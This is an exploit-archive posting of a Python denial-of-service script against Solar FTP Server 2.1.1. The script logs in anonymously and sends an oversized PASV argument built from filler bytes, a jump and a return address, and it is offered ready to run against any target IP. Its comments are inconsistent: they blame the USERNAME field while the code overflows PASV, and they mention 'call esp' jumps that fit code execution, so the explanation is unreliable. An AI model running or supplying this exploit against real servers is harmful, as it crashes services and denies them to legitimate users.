Headline
Solar FTP Server 2.1.1 Denial Of Service
Solar FTP Server version 2.1.1 remote denial of service exploit.
#!/usr/bin/python# Exploit Title: Solar FTP Server 2.1.1 PASV Command - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 31 january 2024# Vendor Homepage: N/A# Download to demo: # Notification vendor: No reported# Tested Version: Solar FTP Server 2.1.1# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)# Vídeo: #1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.import socket,sys,time,structif len(sys.argv) < 2: print("[-]Usage: %s <ip addr> " % sys.argv[0]) sys.exit(0)ip = sys.argv[1]if len(sys.argv) > 2: platform = sys.argv[2]ret = struct.pack('<L', 0x7C9572D8)#works when the server is on 192.168.133.128padding = b"\x43" * 468junk = b"\x43" * 1532frontpad = b"\x41" * 100 + b"\xeb\x30" + b"\x41" * 21payload = frontpad + ret + padding + junkprint ("[+] Solar FTP 2.1.1 PASV - Denied of Service - DoS \n[+] Author: Fernando Mengali\n")print ("[+] Connecting to "+ip)s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)try: s.connect((ip,21))except: print("[-] Connection to "+ip+" failed!") sys.exit(0)print ("[+] Exploiting")print("[*] Sending payload to command PASV...")s.send(b"USER anon\r\n")s.recv(1024)s.send(b"PASS anon\r\n")s.recv(1024)s.send(b"PASV " + payload + b"\r\n")print("[+] Done - Exploited")